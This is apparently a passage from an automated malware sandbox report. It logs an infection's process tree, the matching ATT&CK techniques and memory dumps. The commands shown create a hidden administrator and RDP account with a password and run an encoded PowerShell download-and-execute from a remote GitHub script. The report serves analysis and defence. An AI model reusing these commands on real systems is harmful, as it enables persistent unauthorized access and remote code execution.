  net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
  2⤵
  PID:1180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
    3⤵
    PID:1516

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2884
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3016

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc CHC0ye2u
1⤵
PID:3492
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc CHC0ye2u
  2⤵
  PID:988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc CHC0ye2u
    3⤵
    PID:3408

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:380
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2944

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3316
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3760

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3808
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1756

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1756-196-0x00000195C0B60000-0x00000195C0BB7000-memory.dmp

Filesize
348KB

Download
memory/1756-174-0x00000247EBEF0000-0x00000247EBF10000-memory.dmp

Filesize
128KB

Download
memory/1756-195-0x00000195C0B60000-0x00000195C0BB7000-memory.dmp

Filesize
348KB

Download
memory/1756-199-0x00000195C0B60000-0x00000195C0BB7000-memory.dmp

Filesize
348KB

Download
memory/1756-178-0x00000247EBEF0000-0x00000247EBF10000-memory.dmp

Filesize
128KB

Download
memory/1756-175-0x00000247EBEF0000-0x00000247EBF10000-memory.dmp

Filesize
128KB

Download
memory/2100-158-0x00000272B3F60000-0x00000272B3F80000-memory.dmp

Filesize
128KB

Download
memory/2100-159-0x00000272B3F60000-0x00000272B3F80000-memory.dmp

Filesize
128KB

Download
memory/2100-160-0x00000272B3F60000-0x00000272B3F80000-memory.dmp

Filesize
128KB

Download
memory/2908-168-0x000001A3A1800000-0x000001A3B99E0000-memory.dmp

Filesize
385.9MB

Download
memory/2908-167-0x000001A3A1800000-0x000001A3B99E0000-memory.dmp

Filesize
385.9MB

Download
memory/3788-131-0x000001AA7C4E3000-0x000001AA7C4E5000-memory.dmp

Filesize
8KB

Download
memory/3788-132-0x000001AA7C4E5000-0x000001AA7C4E6000-memory.dmp

Filesize
4KB

Download
memory/3788-133-0x000001AA7C4E6000-0x000001AA7C4E7000-memory.dmp

Filesize
4KB

Download
memory/3788-130-0x000001AA7C4E0000-0x000001AA7C4E2000-memory.dmp

Filesize
8KB

Download
memory/4060-144-0x0000024F66E06000-0x0000024F66E08000-memory.dmp

Filesize
8KB

Download
memory/4060-181-0x0000024F66E08000-0x0000024F66E09000-memory.dmp

Filesize
4KB

Download
memory/4060-152-0x0000024F684C0000-0x0000024F686CA000-memory.dmp

Filesize
2.0MB

Download
memory/4060-151-0x0000024F68130000-0x0000024F682A6000-memory.dmp

Filesize
1.5MB

Download
memory/4060-143-0x0000024F66E03000-0x0000024F66E05000-memory.dmp

Filesize
8KB

Download
memory/4060-142-0x0000024F66E00000-0x0000024F66E02000-memory.dmp

Filesize
8KB

Download
memory/4060-138-0x0000024F66D30000-0x0000024F66D52000-memory.dmp

Filesize
136KB

Download